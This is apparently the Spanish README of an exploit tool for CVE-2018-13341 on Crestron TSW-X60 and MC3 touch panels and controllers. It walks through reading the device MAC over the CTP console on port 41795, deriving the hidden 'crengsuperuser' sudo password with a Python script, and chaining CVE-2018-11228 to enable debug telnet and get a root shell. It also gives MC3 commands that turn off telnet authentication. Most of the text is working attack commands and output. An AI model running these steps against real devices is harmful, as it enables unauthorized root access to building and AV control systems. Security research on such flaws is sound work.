
Herramienta para explotar CVE-2018-13341 y recuperar la contraseña oculta de la cuenta en dispositivos Crestron
Basado en el descubrimiento de Ricky Lawshae en dispositivos Crestron TSW-X60 y MC3, esta herramienta tiene como objetivo explotar la CVE-2018-13341. Usando la dirección MAC del dispositivo objetivo, puedes recuperar la contraseña de la cuenta oculta "crengsuperuser" que tiene privilegios elevados y te permite ejecutar comandos SUDO.
En Crestron TSW-X60 < 2.001.0037.001 y MC3 < 1.502.0047.00, las contraseñas de las cuentas sudo especiales pueden calcularse utilizando información accesible para aquellos con privilegios de usuario normal. Los atacantes podrían descifrar estas contraseñas, lo que podría permitirles ejecutar llamadas API ocultas y escapar del entorno sandbox de la consola CTP con privilegios elevados.
Se puede conectar al Protocolo de la Caja de Herramientas Crestron (CTP) accediendo al puerto 41795 en el dispositivo TSW-XX60. Luego, puedes usar el comando estat para obtener la dirección MAC del dispositivo:
$ nc -C w.x.y.z 41795
TSW-760 Control Console
TSW-760> estat
The EST command has been made obsolete. Please use IPCONFIG instead.
Ethernet Adapter [XYZ]:
Link Status ....... : OK
DHCP .............. : ON
MAC Address ....... : 00.XX.XX.XX.XX.XX
IP Address ........ : [removed]
Subnet Mask ....... : [removed]
IPV6 Address ...... : [removed]
Default Gateway ... : [removed]
DNS Servers ........ : [removed] | DHCP |
[removed] | DHCP |
Esta herramienta requiere el módulo cryptography.
$ pip3 install cryptography
O
$ pip3 install -r requirements.txt
uso: crestron_getsudopwd.py [-h] [-m MAC]
Herramienta para generar contraseñas de cuentas ocultas de Crestron
argumentos opcionales:
-h, --help muestra este mensaje de ayuda y sale
-m MAC, --mac MAC Dirección MAC del objetivo (sin dos puntos ni puntos)
# Example
$ python3 crestron_getsudopwd.py -m aabbccddeeff
[*] Device MAC address: AABBCCDDEEFF
[*] Password for 'crengsuperuser': RgXkA6Q415puxN0t
La CVE-2018-11228 permite RCE sin autenticación a través del Servicio de Shell Bash en el Protocolo de Terminal Crestron (CTP). Después de obtener la contraseña de la cuenta oculta "crengsuperuser" puedes obtener acceso root en el sistema Linux subyacente.
$ nc -C w.x.y.z 41795
TSW-760 Control Console
TSW-760> TELNETPORT OFF
Telnet Port: Off
TSW-760> SUDO RESTARTSERVICE telnetd_debug
Username: crengsuperuser
Password: **************
Service telnetd_debug restarted
TSW-760>
Luego, en una nueva shell, puedes obtener acceso root en el dispositivo.
$ telnet w.x.y.z
bash-3.2# whoami
root
Nota: Este ejemplo es para dispositivos TSW. El proceso es ligeramente diferente para dispositivos MC3. Debes usar los siguientes comandos para habilitar el shell:
SUDO -SN:crengsuperuser -SP:password REGEDIT \\comm\\telnetd addval UseAuthentication DWORD 0luego,SUDO -SN:crengsuperuser -SP:password LAUNCH \\windows\\services.exe /params start tel0:
Aquí hay algunos recursos interesantes relacionados con esta vulnerabilidad: